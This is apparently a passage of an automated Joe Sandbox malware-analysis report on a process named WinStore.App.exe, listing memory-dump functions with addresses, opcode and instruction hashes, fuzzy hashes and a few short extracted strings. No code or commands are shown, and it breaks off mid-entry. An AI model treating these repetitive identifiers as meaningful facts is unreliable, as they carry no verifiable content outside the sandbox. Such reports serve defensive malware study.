Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bef06fea2ba239e1c42c507c2f75059c6dd826ffbf21cd6ac75dfb43ee27eaa
Instruction ID: 5247af4e1fe180f2fa841281ecf4f1793ba865ae344caa3eed3001b8d994ca4a
Opcode Fuzzy Hash: 6bef06fea2ba239e1c42c507c2f75059c6dd826ffbf21cd6ac75dfb43ee27eaa
Instruction Fuzzy Hash: 56115632E0D6DA5FE335EAB448155B93B91EF53380F0400BAD04ADB1C7ED586C068352

Function 00007FF8493039D2 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7a4d0af782c4920091032bf62fc42120ce0ef502e1f8f3f7b6a86cd3c7fa31
Instruction ID: 43cc1740793b4be02098122097474c4bc039f1196237b9a9bc1724fd4dfe7143
Opcode Fuzzy Hash: ef7a4d0af782c4920091032bf62fc42120ce0ef502e1f8f3f7b6a86cd3c7fa31
Instruction Fuzzy Hash: E021CF7060CD8A5FE798EF58D0446A6B391FF15350F50927AC40EC6BCAEB29F8518785

Function 00007FF849304350 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8450f57ba5bde4f0c86915f0d1f028449e1964c0b94ac66d77216538669bacc8
Instruction ID: a1f392f1b1f85b48148c09690da457819399d770b79b0c6d99b6714759bb3bbf
Opcode Fuzzy Hash: 8450f57ba5bde4f0c86915f0d1f028449e1964c0b94ac66d77216538669bacc8
Instruction Fuzzy Hash: CB112B3091D4EB8FE63CAA44D4585B57351EF9134071466F5D48B8749FF83CBA919280

Function 00007FF84930D750 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f2754f3e0a685f21d2b4aa66b5b54256e196ae68719cb283a6b4299c2a0d88
Instruction ID: 7f6e7d1df067ab2570e030078a2ab822435a18f0fb0fbd0a1a2b60fc3d7d7a9a
Opcode Fuzzy Hash: 97f2754f3e0a685f21d2b4aa66b5b54256e196ae68719cb283a6b4299c2a0d88
Instruction Fuzzy Hash: 44110230B1AA499FE754FF6888857B676D2FF89340F00427AC80EC32C6ED28A8458390

Function 00007FF848F10C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523b6c068648f452e6dc162903d137147608017391c7fd461c17708f5159b7e5
Instruction ID: 421df9c069363c8557cd26098fc64d60fa0c13f8a934dccc364e3883a6f5a526
Opcode Fuzzy Hash: 523b6c068648f452e6dc162903d137147608017391c7fd461c17708f5159b7e5
Instruction Fuzzy Hash: 6011C235E0C6998FE702FB3898501AC7BB0EFC2391F1545B7D444DB2D2DA385D498B95

Function 00007FF84930EC48 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e4092d2b7fe0420c52c465aa819cb16a0866823331686e759d0409c0a9bde7
Instruction ID: 9e4890f13cdae908a482e1c8d9873961992110d0373263fcc9f57d26bc43ee40
Opcode Fuzzy Hash: 17e4092d2b7fe0420c52c465aa819cb16a0866823331686e759d0409c0a9bde7
Instruction Fuzzy Hash: A5012B35E0EAC08FDB368FB898580307FB1EF5324070815EFC0558B1ABE826DC4A8351

Function 00007FF848F10C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e235120dde2079695197267b915733f31574896fb54df85fa74ff50bfeaff4c0
Instruction ID: cd841109b5e1e57858e6b74d4f2b4a10d14809256bb20b4d41dc7e822d1ad355
Opcode Fuzzy Hash: e235120dde2079695197267b915733f31574896fb54df85fa74ff50bfeaff4c0
Instruction Fuzzy Hash: 80018C31E0D2998FE706FB7488501A87FB0EF82350F1541F6D444DB2D2DA386A448B85

Function 00007FF848F10C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17dc7260647e20dc591a5379c1fd74712f6701e380a30f875ee591c5f00ab851
Instruction ID: e72d86211a257822d5420b050f09d2857a814edf826b47a1bd8af4e1c89cd120
Opcode Fuzzy Hash: 17dc7260647e20dc591a5379c1fd74712f6701e380a30f875ee591c5f00ab851
Instruction Fuzzy Hash: 64015A30D0D2999EE716FB6488541A97FB0EF82340F1441E6D844DB2D2DA385A448B85

Function 00007FF849301A32 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cbadad4a27a57d85f6e6de8af9e39e496f3a64cce938fd9eeb3ccd126e9002
Instruction ID: 7730a0c2b80562585937478ed6eedb2f4f34326cd55d309dbed9fa3cb904ec96
Opcode Fuzzy Hash: 57cbadad4a27a57d85f6e6de8af9e39e496f3a64cce938fd9eeb3ccd126e9002
Instruction Fuzzy Hash: 9DF0623284D2C59FD716EFF088519E53FB4BF43254B1900F6D445C70A3D66D5A16C762

Function 00007FF849310409 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4976fcccb43c70bcce52c29ad96370ad4c43d52dd55d604485a2ebd6bb856458
Instruction ID: 4817929e43dde0cb8e0610063fb284495f673273c049e84ff90794a7cf2c054b
Opcode Fuzzy Hash: 4976fcccb43c70bcce52c29ad96370ad4c43d52dd55d604485a2ebd6bb856458
Instruction Fuzzy Hash: D1F0822170CB884FD76A563D5869061BFE1DB6661134A02EFC045C75B3DD55AC848341

Function 00007FF84930EBF9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31f7e4c065556ce4f1d70b1f24c11db0453bc73eb75cd792ec1fcaf9453a9aa
Instruction ID: 9f0e01c526f427b0bd9474981406df52974faa3657d2cba775fb17fdcc475233
Opcode Fuzzy Hash: a31f7e4c065556ce4f1d70b1f24c11db0453bc73eb75cd792ec1fcaf9453a9aa
Instruction Fuzzy Hash: 18F0A03170CFC80FC729A66D586C061BFE1DB6A11234A02EFC045C76B3ED59AC898341

Function 00007FF84930272A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3256e8a895ec4190143cc1b1764de0c52daad42c954edd09314cbcce633f4437
Instruction ID: 235616f7735f6deceda55a9189c0bf98b71ccb2657c7aff1b5d14e4289e22aa8
Opcode Fuzzy Hash: 3256e8a895ec4190143cc1b1764de0c52daad42c954edd09314cbcce633f4437
Instruction Fuzzy Hash: 3EF0B430A0D3C64FEB32AFB44C915A83B90DF2739075816FAC4888B1D7E6586416C311

Function 00007FF8493089C6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36fcfd596319808464093094f9f26c5710bf4e361a95d25a3a85aad4e7840faf
Instruction ID: ebb5d1adf5de25a4dd2a65f2701e8957f9f82e3ec4d2b4a42ee88307eac4cd44
Opcode Fuzzy Hash: 36fcfd596319808464093094f9f26c5710bf4e361a95d25a3a85aad4e7840faf
Instruction Fuzzy Hash: E2F05431A0C956CFF354EF48C4917E87292EF86360F1546B5D00DC72DAE97969858741

Function 00007FF848F10CF6 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464cb75acea2ec7d2766d6f6c3171005da180dbc796bc5719d4f54befa538043
Instruction ID: 8e5ec1117bcead339eda5efad03e0ccf9471f2e4b24086c9c87f580dfa35ef11
Opcode Fuzzy Hash: 464cb75acea2ec7d2766d6f6c3171005da180dbc796bc5719d4f54befa538043
Instruction Fuzzy Hash: 9CF09A30A0C61ADEE744FB28C4546B9B7E0EF85351F0445BAD409C22C5DB386980CA44

Function 00007FF84930AB61 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b74b74fdc1786b150203fdf713b923812054b3b33bdd067f1d14d58c50208d0
Instruction ID: 0d45ab45d260d7bf2fbab7c3a15d86a202b985009eb9906aa024896744326ef0
Opcode Fuzzy Hash: 5b74b74fdc1786b150203fdf713b923812054b3b33bdd067f1d14d58c50208d0
Instruction Fuzzy Hash: 1FE0DF3284D1C89FEB226BA058054E97FA0AF43280F0842E2E48C8609BFA0966188341

Function 00007FF848F12059 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction ID: 271109bace68a448b03296f9a2978d98b3a8219b63f426e419592f8b63db6b92
Opcode Fuzzy Hash: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction Fuzzy Hash: 6EE01A34E0C4268AF754B384C8A13AA62A1EB88380F141478D90EAB3C6DF28AE048609

Function 00007FF848F1659F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd3f3948a299467a626a4ddfe105bcf966c04cc0415cab18ca2841bb1bd2114
Instruction ID: 10c24f0e4f78098007d82c17f46c7a6bbada8025f70afd0bfa59081f42c4b642
Opcode Fuzzy Hash: 1dd3f3948a299467a626a4ddfe105bcf966c04cc0415cab18ca2841bb1bd2114
Instruction Fuzzy Hash: A0E01221F1C5554EF799B36C046537950C1AF88791F484179D44ED32C3DD0C1C801256

Function 00007FF848F10B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction ID: 3b6ecfeb429b7bdf7a2efdbfe5a76b4c8119fb1516b0ed083cbf24cac6ee314a
Opcode Fuzzy Hash: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction Fuzzy Hash: E4C0123062880E8FDA84BB28C888824BBA0FB0E305FD914E0E00CC71A1D65998908704

Function 00007FF848F106A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction ID: 6b0bbab47607f1277e6d227bc57c408340de40530cf265c38c12c70a8ba58f3e
Opcode Fuzzy Hash: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction Fuzzy Hash: 96C08C20D1E42B08F401B32E24020BCA1005BC8390FD40073D80C800C1BE0D28C9015E

Function 00007FF848F112D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction ID: f0a3450ba08c63ef195dbce6ec2b7b3064680c18c825c5f33a8e418fcaf98514
Opcode Fuzzy Hash: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction Fuzzy Hash: BCC04C345558498FC948FB29C88991477A0FB59315BD501A0E409C71B1D669ECD5C745

Function 00007FF84930322B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2793598787.00007FF849300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff849300000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction ID: 2d0e7e7eb0e4461100c3bfc8da73fe1c1a68de3387f8eaa6e2be9b5510f83a97
Opcode Fuzzy Hash: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction Fuzzy Hash: 2DD0C934A0C5D38DF5397E82C02033A51985F06BC0E6060BED05F49CCAEE1C75016206

Function 00007FF848F1251B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d373a4667b2622fffddc6e5925a737a3193912773828961a0294b30c0dd96cd7
Instruction ID: 542dd819303a3e7c2a89447a0e808fbcc55af2964a59df8da6094cde9bd6e208
Opcode Fuzzy Hash: d373a4667b2622fffddc6e5925a737a3193912773828961a0294b30c0dd96cd7
Instruction Fuzzy Hash: B8C04C21F1E81626F556B35894113BF08539B44784F551034E00DD67CACE4E5E5122CA

Function 00007FF848F106C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction ID: 2c70a285f3961446df434a2e40cbb7dd173ad9fa6e9f6b60cef759bacad93db2
Opcode Fuzzy Hash: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction Fuzzy Hash: FBB01210C6E44F04E444337A1842079B0405B88340FC400B0D80C801C1AA4D1998025A

Non-executed Functions

Function 00007FF848F109B0 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FF848F10B4E
c9, xrefs: 00007FF848F10B56
#{9, xrefs: 00007FF848F10B3E
"s9, xrefs: 00007FF848F10B46

Memory Dump Source

Source File: 00000021.00000002.2787153156.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_WinStore.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 3e66a2881e3b9b8727a72305aa08277b40f18a718f3831b2ddf943178dfa05e7
Instruction ID: 05108c4a1d14bbe8c6f71d1c74300305079e536f73283d3de1a83a869d850ef3
Opcode Fuzzy Hash: 3e66a2881e3b9b8727a72305aa08277b40f18a718f3831b2ddf943178dfa05e7
Instruction Fuzzy Hash: C4515E1BA2F562A9E25137BDB0015EA5B64EFC53B9F084777E14C8D0C38E0C688682FD

Analysis Process: WinStore.App.exePID: 5580, Parent PID: 3524COMMON

Executed Functions

Function 00007FF848F306B6 Relevance: 2.8, Strings: 1, Instructions: 1506COMMON

Download Yara Rule

Strings

M_H, xrefs: 00007FF848F317EF

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: M_H
API String ID: 0-3997733227
Opcode ID: cee0c76dab105363d16d7e79fdf935794624b281f4eeaaf791de85fa21c71c29
Instruction ID: a4dadcc3e553cde0d2c3bb13e59f0f78b47f30436624a65bc8684828ddf84993
Opcode Fuzzy Hash: cee0c76dab105363d16d7e79fdf935794624b281f4eeaaf791de85fa21c71c29
Instruction Fuzzy Hash: 35B28231E1C95A8FEB98FB2894556B973A2FF98741F1441BAD40DC32C6DF38AC828745

Function 00007FF84931E5A4 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4dfc57654754d812d991d4e067ae65efaf3b77f06c8e68f2ab3431b9e111097
Instruction ID: 0cd83f61203fc6dee2aae97111f2937653ea8c05112496263fee3b28d85dd60f
Opcode Fuzzy Hash: a4dfc57654754d812d991d4e067ae65efaf3b77f06c8e68f2ab3431b9e111097
Instruction Fuzzy Hash: EAD1C431F1C9994FE7A8FB28845B6B973D2EF99741F4401BAD40ED32D2EE296C428741

Function 00007FF848F5339D Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

@aH, xrefs: 00007FF848F53458
M, xrefs: 00007FF848F53346

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: @aH$M
API String ID: 0-2096102131
Opcode ID: 9d07df33aa68d1cfb16a130b13104a7ed14cb86e132801c6919d0d43d85f861e
Instruction ID: 5414920d956490855339a7b248ef0e1cbf48e85ea4b853058c4200d93737a5d5
Opcode Fuzzy Hash: 9d07df33aa68d1cfb16a130b13104a7ed14cb86e132801c6919d0d43d85f861e
Instruction Fuzzy Hash: B991C131E1C98A5FEA89FB2C84562B5B2D1FF96341F8441B9C40EC72C7DE2CA8858795

Function 00007FF849311AAB Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

(-I, xrefs: 00007FF849311AEE

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID: (-I
API String ID: 0-1459938978
Opcode ID: 06296d9c27907fc37bb0c687408fba8430c752b8d51f08a6194700e71a9b55f0
Instruction ID: cfa746a016e8337e509c42ed8a272ebe712339536906028bbd9f18fca7e7d573
Opcode Fuzzy Hash: 06296d9c27907fc37bb0c687408fba8430c752b8d51f08a6194700e71a9b55f0
Instruction Fuzzy Hash: 8981903091D58A9EE7A5EFA48892AFD7BE1FF46380F105579D00ED71A2EA286C41C711

Function 00007FF849313D52 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF849313DC2

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 07cd82dc05759d595508c4c0f5887bf1026c4e7667b83aaf3085bf3d3f819189
Instruction ID: 8f67fb0b9c7fae56198acb3259cfbc80e02add2a4910b37c5e58c9855ee58bdb
Opcode Fuzzy Hash: 07cd82dc05759d595508c4c0f5887bf1026c4e7667b83aaf3085bf3d3f819189
Instruction Fuzzy Hash: 84518931D0C68E9FEB59EFA8C4565BDBBB1FF49340F1040BAC04AE7296DA386905CB50

Function 00007FF848F5E321 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

0zH, xrefs: 00007FF848F5E3C4

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: 0zH
API String ID: 0-1873325940
Opcode ID: 2ec2cf0fec1fcc999850e68171d6c909d9de7b5a24a5cf2b4e30ffad3e8791b9
Instruction ID: 89492539ecd677317b8fb1bc7dc65817ba26e05bc45c5a5281144f10b5707e91
Opcode Fuzzy Hash: 2ec2cf0fec1fcc999850e68171d6c909d9de7b5a24a5cf2b4e30ffad3e8791b9
Instruction Fuzzy Hash: BF21B431E1C8194FE794F718E4587B8B7E2EB947A1F04067AC40AD32DACE286C868780

Function 00007FF848F5A589 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F5A5A6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 39d485c39d75203fa83b32648f37b57ddbb0d1ca4fed0db784bdbf0bba6fdfcb
Instruction ID: 2c65341fe87d3dc42f9af352c45cfb61b51c5703aab6ecc9c23dbf752c308854
Opcode Fuzzy Hash: 39d485c39d75203fa83b32648f37b57ddbb0d1ca4fed0db784bdbf0bba6fdfcb
Instruction Fuzzy Hash: A2F06571A0E7844FD71AAA3484594547FA0EF6721274941EEC045CF1A7EA2DC885CB01

Function 00007FF848F5BDA9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F5BDC6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 82f1e30fd655d44be984a5f811716b06dcd9a18be736632a267ccd1ff13519e6
Instruction ID: 4d8a2e331beda96765bef53055a2a025417678da8f34b667801931f5cb05ac93
Opcode Fuzzy Hash: 82f1e30fd655d44be984a5f811716b06dcd9a18be736632a267ccd1ff13519e6
Instruction Fuzzy Hash: 1DF0397160E7C48FD71AEB348869854BFA0EF6731174A52EEC046CF1A7EA2D9885CB01

Function 00007FF848F52F09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F52F26

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 2d08f607c70aa477343c8fa67f5a8f1689e6c7262d36686c0c8a04e417e6bb3e
Instruction ID: 4e58fe019798ffdcfd56b74164f3d9fc7e510ee2b0a888511723226c47376534
Opcode Fuzzy Hash: 2d08f607c70aa477343c8fa67f5a8f1689e6c7262d36686c0c8a04e417e6bb3e
Instruction Fuzzy Hash: 66F0657150E7C44FC759EA348869454BFA0EF6721174952EFC045CF1A7EA2D8C86C701

Function 00007FF848F51C39 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F51C56

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 52b2a3198e5558cb55a1050b4a6ff69a03a2f99c774e873dbfd6ce2d5c82ada8
Instruction ID: 14b49fbd7f3718354062e3bf227f97445ef93e77a47b7b5711e298788e8dbb7d
Opcode Fuzzy Hash: 52b2a3198e5558cb55a1050b4a6ff69a03a2f99c774e873dbfd6ce2d5c82ada8
Instruction Fuzzy Hash: 99F0657190E7C44FC75AEB348868454BF60EF6721574951EFC046CF1A3EA2D9C85C701

Function 00007FF848F336D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F336F6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a84c76dbe180f3b0fbe53b1f6dab1abb5a120e7e91ed6fe29c96ae147d7f2c45
Instruction ID: 3f05a2b3a48f8c4bd114a2655b92aa0c5e688756614e89ebe0d7feb108b76a03
Opcode Fuzzy Hash: a84c76dbe180f3b0fbe53b1f6dab1abb5a120e7e91ed6fe29c96ae147d7f2c45
Instruction Fuzzy Hash: 41E0657150E7C44FC716E6348868455BFA0EF6721174A41EFC045CF1A7EA1D8845C701

Function 00007FF848F5A619 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

